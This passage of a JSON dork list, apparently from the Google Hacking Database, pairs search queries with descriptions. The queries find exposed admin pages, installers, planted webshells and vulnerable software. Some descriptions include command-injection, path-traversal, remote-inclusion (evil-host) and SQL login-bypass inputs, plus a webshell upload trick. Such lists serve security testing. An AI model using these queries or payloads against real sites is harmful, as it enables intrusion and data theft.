Google can crawl it, it's potentially using cleartext authentication."}, {"dork": "allinurl:intranet admin", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering."}, {"dork": "allinurl:install/install.php", "description": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images."}, {"dork": "inurl:pls/admin_/gateway.htm", "description": "This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server."}, {"dork": "intitle:\"Gateway Configuration Menu\"", "description": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query."}, {"dork": "filetype:php inurl:vAuthenticate", "description": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule."}, {"dork": "\"Welcome to the Prestige Web-Based Configurator\"", "description": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router."}, {"dork": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "description": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it."}, {"dork": "filetype:cgi inurl:\"Web_Store.cgi\"", "description": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point."}, {"dork": "filetype:cgi inurl:\"fileman.cgi\"", "description": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds)."}, {"dork": "inurl:\"index.php?module=ew_filemanager\"", "description": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module."}, {"dork": "allinurl:\"index.php\" \"site=sglinks\"", "description": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com"}, {"dork": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", "description": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there."}, {"dork": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search."}, {"dork": "natterchat inurl:home.asp -site:natterchat.co.uk", "description": "NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access..."}, {"dork": "inurl:aol*/_do/rss_popup?blogID=", "description": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email."}, {"dork": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "description": "This is a \"double dork\" finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal."}, {"dork": "inurl:newsdesk.cgi? inurl:\"t=\"", "description": "Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely."}, {"dork": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "description": "CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html"}, {"dork": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "description": "This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken."}, {"dork": "inurl:servlet/webacc", "description": "I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=\"> this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context"}, {"dork": "inurl:\"/NSearch/AdminServlet\"", "description": "This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'."}, {"dork": "\"Powered by: vBulletin Version 1.1.5\"", "description": "This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions."}, {"dork": "\"html allowed\" guestbook", "description": "When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like or adding a loop javascript pop-up"}, {"dork": "\"set up the administrator user\" inurl:pivot", "description": "Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog."}, {"dork": "XOOPS Custom Installation", "description": "XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data."}, {"dork": "intitle:\"MvBlog powered\"", "description": "MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss"}, {"dork": "inurl:\"read.php?datespan=\"", "description": "https://www.exploit-db.com/exploits/5703/"}, {"dork": "intitle:\"A Better ASP User Gallery\"", "description": "https://www.exploit-db.com/exploits/8012/"}, {"dork": "allinurl: In YoUr Dream Lamerz", "description": "https://www.exploit-db.com/exploits/14078/"}, {"dork": "allinurl: op=viewslink&sid=", "description": "https://www.exploit-db.com/exploits/12514/"}, {"dork": "\"intitle:t3al shmeh\"", "description": "https://www.exploit-db.com/exploits/9347/"}, {"dork": ": inurll ', -font => '{Verdana} 8 bold') ->pack ( -side => \"top\" , -anchor => 'e' ) ;", "description": "https://www.exploit-db.com/exploits/3759/"}, {"dork": "inurl:/vb/install/install.php", "description": "Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn"}, {"dork": "intitle:\"[EasyPHP] - Administration\"", "description": "Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)"}, {"dork": "intitle:Locus7shell intext:\"Software:\"", "description": "intitle:Locus7shell intext:\"Software:\"\nSubmitted by lionaneesh\n-- \nThanks\nAneesh Dogra (lionaneesh)"}, {"dork": "intitle:m1n1 1.01", "description": "find the b374k shell.... \nSubmitted by : biLLbud"}, {"dork": "intitle:#k4raeL - sh3LL", "description": "intitle:#k4raeL - sh3LL\nFinds K4rael Shell , though many of them are dead but we can get some and\neven cache data can get you information , making website vulnerable\nAuthor: cyb3r.pr3dat0r"}, {"dork": "filetype:php inanchor:c99 inurl:c99 intitle:c99shell -seeds -marijuana", "description": "This search attempts to find the c99 backdoor that may be knowingly or\nunknowingly installed on servers. I have refined the search in hopes that\nmore general talk about the backdoor, and also talk about the marijuana\nstrain does not pollute the results quite as much.\nAuthor: Teague Newman"}, {"dork": "intitle:awen+intitle:asp.net", "description": "Hi,\nThis google dork exposes any already uploaded asp.net shells which are\navailable in BackTrack.\nhttp://www.google.com/search?q=intitle:awen+intitle:asp.net\nThanks,\nSagar Belure"}, {"dork": "intext: intext: intext: intext: intext:", "description": "More than 100k sites affected\nIt will show asp sites that are vulnerable to sql injection\n(These links actually show pages which are attacked by mass Sql\nInjection...which means they are vulnerable to sql Injection)\n #Author\n ----- pgolecha\n Palash Golecha\n twitter- @pgolecha12"}, {"dork": "intext:SQL syntax & inurl:index.php?=id & inurl:gov & inurl:gov", "description": "# Exploit Title: SQLI Exploit\n# Google Dork: intext:SQL syntax & inurl:index.php?=id & inurl:gov &\ninurl:gov\n# Date: 25/December/2012\n# Exploit Author: BeastarStealacar\n# Vendor Homepage: http://devil-zone.net/"}, {"dork": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin", "description": "inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin\nview phpMyAdmin of web sites\nAuthor: Un0wn_X\nFollow: @UnownSec\nE-Mail: unownsec@gmail.com"}, {"dork": "inurl:\"struts\" filetype:action", "description": "Google search for actoin files wich could be explotable via CVE-2013-2251\n\"Multiple Remote Command Execution Vulnerabilities in Apache Struts\""}, {"dork": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "description": "Search Oracle Reports likely vulnerable to DB user/password disclosure\n(CVE-2012-3152\nand CVE-2012-3153)\n-- \nFelipe Molina"}, {"dork": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "description": "Search for all Apache servers that are running specific versions of\nOpenSSL. These specific versions of OpenSSL could potentially be vulnerable\nto the heartbleed attack.\nAhmad Al-Nounou"}, {"dork": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org\nlook for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch. Ignore github and drupal.org"}, {"dork": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com\nsites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txt\nCan then check the CHANGELOG.txt file manually for version (not 7.32?)."}, {"dork": "allinurl:moadmin.php -google -github", "description": "The dork \"allinurl:moadmin.php -google -github\" show all the sites that\nuses Mongo DB\nand the moadmin module to amministrate it.\nSome versions of this module allow non autenticated user to execute\narbitrary Unix commands sending a special POST request documented here:\nhttps://www.exploit-db.com/exploits/36251/\nPsyDel"}, {"dork": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "description": "The dork \"allintext:Copyright Smart PHP Poll. All Rights Reserved.\n-exploit\" show all the sites that uses Smart Pool php module.\nThe login page can be bypassed using these credentials\nUser: admin 'or' 1=1\nPassword: anything\nMore info here: https://www.exploit-db.com/exploits/36386/\nPsyDel"}, {"dork": "\"dirLIST - PHP Directory Lister\" \"Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx\" \"index of\" ext:php", "description": "Google Dork: \"dirLIST - PHP Directory Lister\" \"Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx\" \"index of\" ext:php\nFind vulnerable servers: dirLIST - PHP Directory Lister v0.3.0\nGoogle Dork by Ini Lerm\nExample to exploit it using a form in PHP and upload a webshell.\nRemember, rename your webshell.\nIf your webshell is called \"shell1.php\" rename \"shell1.php .;\"\n------------------------------------------PHP CODE--------------------------------------------------------"}, {"dork": "inurl:\"index.php?option=com_joomanager\"", "description": "1. Google inurl:\"index.php?option=com_joomanager\" = 3540 results\r\n\r\n2. [URL]+/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php gives a file which has password in PLAINTEXT!\r\n\r\nSource: https://twitter.com/ankit_anubhav/status/970673767750959104"}, {"dork": "inurl:\"/user/register\" \"Powered by Drupal\" -CAPTCHA -\"Access denied\"", "description": "GoogleDork #1 ~ inurl:\"/user/register\" \"Powered by Drupal\" -CAPTCHA -\"Access denied\"\r\n\r\nGoogleDork #2 ~ inurl:\"user/register?element_parents=account/mail\"\r\n\r\nGoogleDork #3 ~ inurl:\"*drupal_ajax\"\r\n\r\nGoogleDork #4 ~ ;)"}, {"dork": "inurl:\"q=user/password\"", "description": "for finding drupal"}, {"dork": "\"Powered by vBulletin Version 5.5.4\"", "description": "vBulletin 5.x 0day pre-auth RCE exploit\r\n\r\nThis should work on all versions from 5.0.0 till 5.5.4\r\n\r\nGoogle Dorks:\r\n- site:*.vbulletin.net\r\n- \"Powered by vBulletin Version 5.5.4\""}, {"dork": "\"Powered by Jira Service Desk\"", "description": "# Google Dork: \"Powered by Jira Service Desk\"\r\n\r\n# By using this dork it is possible to find sites vulnerable to\r\nCVE-2019-15003, CVE-2019-15004.\r\n\r\n# Date: 29/05/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"AT-admin.cgi\"", "description": "Description: intitle:\"index of\" \"AT-admin.cgi\"\r\nAuthor: Mohammed Arif H"}, {"dork": "intext:\"(c) GUnet 2003-2007\"", "description": "# Google Dork: intext:\"\u00a9 GUnet 2003-2007\"\r\n\r\n# GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection. This\r\ndork is linked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/48106 ,\r\nhttps://www.exploit-db.com/exploits/48163\r\n\r\n# Date: 04/06/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/+CSCOE+/logon.html", "description": "# Dork: inurl:/+CSCOE+/logon.html\r\n# Author: Simgamsetti Manikanta\r\n# Date: 2020-06-04"}, {"dork": "intitle:\"index of\" \"filemail.pl\"", "description": "Author: Mohammed Arif H\r\nDork: intitle:\"index of\" \"filemail.pl\""}, {"dork": "intitle:\"index of\" \"shell.php\"", "description": "This dork will give you all the server which are affected by shells.\r\nDork: intitle:\"index of\" \"shell.php\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/"}, {"dork": "site: target.com ext:action | ext:struts | ext:do", "description": "*Dork:* site: target.com ext:action | ext:struts | ext:do\r\n\r\n*Description:* This google dork will list up all the sites which use struts\r\nframework in there site.\r\n\r\n*Author:* Sushant Shashikant Kamble\r\nhttps://www.linkedin.com/in/iamsushantkamble"}, {"dork": "intext:\"Powered By Gila CMS\"", "description": "# Google Dork: intext:\"Powered By Gila CMS\"\r\n# Gila CMS 1.9.1 - Cross-Site Scripting. This dork is linked to the\r\n# following existing exploit: https://www.exploit-db.com/exploits/46557\r\n\r\n# Date: 17/06/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Wing FTP Server - Web\"", "description": "# Google Dork: intitle:\"Wing FTP Server - Web\"\r\n# Wing FTP Server 6.2.5 - Privilege Escalation. This dork is linked to the\r\n# following existing exploit: https://www.exploit-db.com/exploits/48154\r\n# Date: 15/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Vulnerability Report\" \"Critical\" ext:pdf", "description": "# Google Dork: intitle:\"Vulnerability Report\" \"Critical\" ext:pdf\r\n# Vulnerability Reports.\r\n# Date: 30/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:RichWidgets/Popup_Upload.aspx", "description": "# Google Dork: inurl:RichWidgets/Popup_Upload.aspx\r\n# Date: 2020-11-11\r\n# Author: Bryan Rodriguez Martin\r\n# This search returns endpoints where files can be uploaded without authentication."}, {"dork": "intext:\"user name\" intext:\"orion core\" -solarwinds.com", "description": "# Google Dork: intext:\"user name\" intext:\"orion core\" -solarwinds.com\r\n# Description: discover SolarWindws Orion web consoles exposed to the Internet.\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "inurl /editor/filemanager/connectors/uploadtest.html", "description": "# Google Dork: inurl /editor/filemanager/connectors/uploadtest.html\r\n\r\n# CKEditor 3 - Server-Side Request Forgery (SSRF).\r\nhttps://www.exploit-db.com/exploits/50021\r\n\r\n# Date: 18/6/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Icecast Streaming Media Server\" \"Icecast2 Status\" -.com", "description": "# Google Dork: intitle:\"Icecast Streaming Media Server\" \"Icecast2 Status\" -.com\r\n# Web Server Detection\r\n#Date: 03/08/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"index of\" \"/views/auth/passwords\"", "description": "# Google Dork: intitle:\"index of\" \"/views/auth/passwords\"\r\n# Vulnerable Server\r\n# Date: 08/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"TileServer GL - Server for vector and raster maps with GL styles\"", "description": "# Google Dork: intitle:\"TileServer GL - Server for vector and raster maps with GL styles\"\r\n# Vulnerable Servers\r\n# Date:07/07/2021\r\n# Exploit Author: Jan-Jaap Korpershoek"}, {"dork": "inurl:adm/login.jsp.bak", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Vulnerable Server\r\n# Date: 12/11/2021 \r\n# Exploit Author: Md Anzaruddin"}, {"dork": "intitle:\"HFS\" AND intext:\"httpfileserver 2.3\" AND -intext:\"remote\"", "description": "# Dork: intitle:\"HFS\" AND intext:\"httpfileserver 2.3\" AND\r\n-intext:\"remote\"\r\n# Author: Alexander Ahmann\r\n# Email: hackermaneia@riseup.net\r\n# Date: 11 March, 2022\r\n# Category: Vulnerable Servers\r\n\r\nThapa (2016) devised an exploit targeting version 2.3 of Rejetto.com\r\n(n.d.)'s \"HTTP File Server.\" Thapa included the Google dork\r\n'intext:\"httpfileserver 2.3\"' as a means to find webservers on the\r\ninternet running the vulnerable service. However, there is a limitation\r\nwith this dork, as it instructs Google's search engine to list websites\r\nwhich includes web pages with the text \"httpfileserver 2.3\" in it. This\r\nwill cause Google search to report security bulletins discussing the\r\nvulnerability.\r\n\r\nTo mitigate this problem, I present a slight modification of Thapa's\r\nGoogle dork to \"filter out\" said security bulletins: 'intitle:\"HFS\" AND\r\nintext:\"httpfileserver 2.3\" AND -intext:\"remote\"' (without single\r\nquotes, with double quotes). Elaborating on the components of my\r\nmodified Google dork:\r\n\r\n1. 'intitle:\"HFS\"' will report web pages with the string \"HFS\" in the\r\n metatag. This is a feature that I have identified unique to\r\nRejetto.com (n.d.)'s HTTP File Server.\r\n2. 'intext:\"httpfileserver 2.3\"' will report web pages with the string\r\n\"httpfileserver 2.3\" in its body. This is a feature that Thapa (2016)\r\nidentified in Rejetto.com (n.d.)'s HTTP File Server.\r\n3. '-intext:\"remote\"' will \"filter out\" web pages with the string\r\n\"remote\" in its body. I have identified this string as a feature of\r\nsecurity bulletins reporting on the Rejetto.com (n.d.)'s HTTP File\r\nServer vulnerability.\r\n\r\nThe \"AND\" boolean operator is used to narrow down the search results and\r\ndecrease the rate of false positives.\r\n\r\nReferences\r\n----------\r\nRejetto.com (n.d.). HFS ~ HTTP File Server. Retrieved on Mar. 11, 2022\r\nfrom: http://rejetto.com/hfs/\r\n\r\nThapa, A. K. (2016). Rejetto HTTP File Server (HFS) 2.3.x - Remote\r\nCommand Execution (2). Exploit Database. Retrieved on Mar. 11, 2022\r\nfrom: https://www.exploit-db.com/exploits/39161"}, {"dork": "inurl:\"/geoserver/ows?service=wfs\"", "description": "# Google Dork: inurl:\"/geoserver/ows?service=wfs\"\r\n# Vulnerable Servers\r\n# Date: 04/07/2023\r\n# Author: Bipin Jitiya"}, {"dork": "inurl:install.php intitle:\"Froxlor Server Management Panel - Installation\"", "description": "inurl:install.php intitle:\"Froxlor Server Management Panel - Installation\""}, {"dork": "Apache Struts 2.x Path Traversal Vulnerability (CVE-2023-50164) Detection Dork", "description": "Dork:\r\nintitle:\"Apache Struts 2.5\" \"index of /\" -git\r\nExplanation:\r\nintitle:\"Apache Struts 2.5\": This part specifies that the search results\r\nmust have the words \"Apache Struts 2.5\" in the title. It helps narrow down\r\nthe results to instances related specifically to Apache Struts version 2.5.\r\n\r\n\"index of /\": This part looks for directories with the \"index of /\" string.\r\nSuch directories often contain a listing of files and folders, which could\r\nbe unintentionally exposed and may include sensitive information.\r\n\r\n-git: This part excludes results that contain the term \"git\". The idea is\r\nto filter out Git repositories from the search results, focusing on other\r\ntypes of exposed directories.\r\n\r\n*Sample output : *\r\nhttps://mirror.softaculous.com/apache/struts/2.5.30/\r\nhttps://ftp.unicamp.br/pub/apache/struts/2.5.25/\r\nhttps://ftp.itu.edu.tr/Mirror/Apache/struts/2.5.32/\r\nhttps://repository.jboss.org/maven2/apache-struts/struts/\r\nhttps://mirrors.gigenet.com/apache/struts/\r\nhttps://ftp.riken.jp/net/apache/struts/\r\nhttps://mirror.math.princeton.edu/pub/apache/struts/\r\n\r\n This Google dork is searching for instances where the title includes\r\n\"Apache Struts 2.5,\" and the webpage has a directory listing (\"index of /\")\r\nbut excludes any results related to Git repositories. The aim is to\r\nidentify potentially exposed Apache Struts 2.5 instances that might have\r\nunintentionally revealed directory structures.\r\n\r\n\r\nAdditional Information:\r\n\r\nAffected versions: Struts 2.x before 2.5.33 or 6.x before 6.3.0.2\r\nDescription: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50164\r\n\r\nThank you for your consideration.\r\n\r\nSincerely,\r\n\r\n-- \r\n*Parth Jamodkar*\r\n\r\n*CLoud security researcher 3*\r\n*LinkedIn*"}, {"dork": "intitle:\"OpenVpn Status Monitor\"", "description": "# Exploit Title: Anonymous Access to OpenVpn Monitoring Dashbaord\r\n# Google Dork: intitle:\"OpenVpn Status Monitor\"\r\n# Date: 27 Jan 2024\r\n# Exploit Author: Sabean Technology\r\n# Vendor Homepage: https://github.com/furlongm/openvpn-monitor\r\n\r\nDemewoz Agegnehu | Sabean Technology | https://sabtechx.com"}, {"dork": "intitle:\"Installation Wizard - PowerCMS v2\"", "description": "Author: nadirb19\r\nDork: intitle:\"Installation Wizard - PowerCMS v2\""}, {"dork": "intitle:\"Welcome to iTop version\" wizard", "description": "Author: nadirb19\r\nDork: intitle:\"Welcome to iTop version\" wizard"}, {"dork": "allintitle:\"Bright Cluster Manager\" site:.edu", "description": "#Google Dork: allintitle:\"Bright Cluster Manager\" site:.edu\r\n#Pages Containing Login Portals\r\n#Date: 1/12/2024\r\n#Author: *Baldwin Hackers*"}], "Error Messages": [{"dork": "\"ORA-00921: unexpected end of SQL command\"", "description": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames."}, {"dork": "intitle:\"the page cannot be found\" inetmgr", "description": "IIS 4.0 servers. Extrememly old, incredibly easy to hack..."}, {"dork": "intitle:\"the page cannot be found\" \"2004 microsoft corporation\"", "description": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box..."}, {"dork": "\"Fatal error: Call to undefined function\" -reply -the -next", "description": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code."}, {"dork": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", "description": "This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based."}, {"dork": "\"The script whose uid is \" \"is not allowed to access\"", "description": "This PHP error message is revealing the webserver's directory and user ID."}, {"dork": "intitle:Configuration.File inurl:softcart.exe", "description": "This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths."}, {"dork": "\"Warning: mysql_query()\" \"invalid query\"", "description": "MySQL query errors revealing database schema and usernames."}, {"dork": "\"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near\" -forum -thread -showthread", "description": "you can find many servers infected with sql injection"}, {"dork": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "description": "PHP error with a full web root path disclosure"}, {"dork": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "description": "search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query."}, {"dork": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "description": "This error message reveals full path information. Recommend use of site: operator to narrow searches."}, {"dork": "\"Warning: Division by zero in\" \"on line\" -forum", "description": "Just another error that reveals full paths."}, {"dork": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\" -help -forum", "description": "This dork reveals logins to databases that were denied for some reason."}, {"dork": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "description": "Just another error message."}, {"dork": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "description": "and another error. open it from cache when not working."}, {"dork": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "description": "another error message"}, {"dork": "allintext:\"fs-admin.php\"", "description": "A foothold using allintext:\"fs-admin.php\" shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.\r\n\r\n\r\n\r\nAuthor: DigiP"}, {"dork": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "description": "PHP Error Messages"}, {"dork": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "description": "Just another error that reveals full paths"}, {"dork": "intitle:Error Page pageWrapper.jsp?", "description": "\"java.lang.NullPointerException\" Error\nThanks,\nXploit"}, {"dork": "intitle:Content Server Error IdcService=DOC_INFO", "description": "Oracle WebCenter Content\nContent Server Error\n-Xploit"}, {"dork": "inurl:/SAML2/SOAP/ | inurl:/SAML2/POST", "description": "Shibboleth Error XML\n-Xploit"}, {"dork": "inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm", "description": "RSA Self-Service Console \"Error\"\n-Xploit"}, {"dork": "inurl:/smpwservices.fcc | \"/lm_private/CkeSetter.aspx\"", "description": "CA Technologies CA Single Sign-On (CA SSO) Error's. \n-Xploit"}, {"dork": "inurl:/siteminderagent/ | app:\"Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/\"", "description": "CA Technologies CA Single Sign-On (CA SSO) Error's. \n-Xploit"}, {"dork": "intitle:\"DSM Terminator [ ABORT ]\" | inurl:\"./com.sap.portal.dsm.Terminator\"", "description": "DSM Terminator Error\n-Xploit"}, {"dork": "\"Below is a rendering of the page up to the first error.\" ext:xml", "description": "Some nice error messages that give you WAY too much info.\nDxtroyer"}, {"dork": "\"--- WebView Livescope Http Server Error ---\" -git", "description": "WebView server errors, mostly found on older servers\nDxtroyer"}, {"dork": "intitle:\"CGIWrap Error\"", "description": "Finds CGIWrap script errors containing some interesting information!\nDxtroyer"}, {"dork": "inurl:\".php?id=\" \"You have an error in your SQL syntax\"", "description": "This dork allows us to find websites that are possibly vulnerable to sql injections\ninurl:\".php?id=\" \"You have an error in your SQL syntax\"\nDrok3r"}, {"dork": 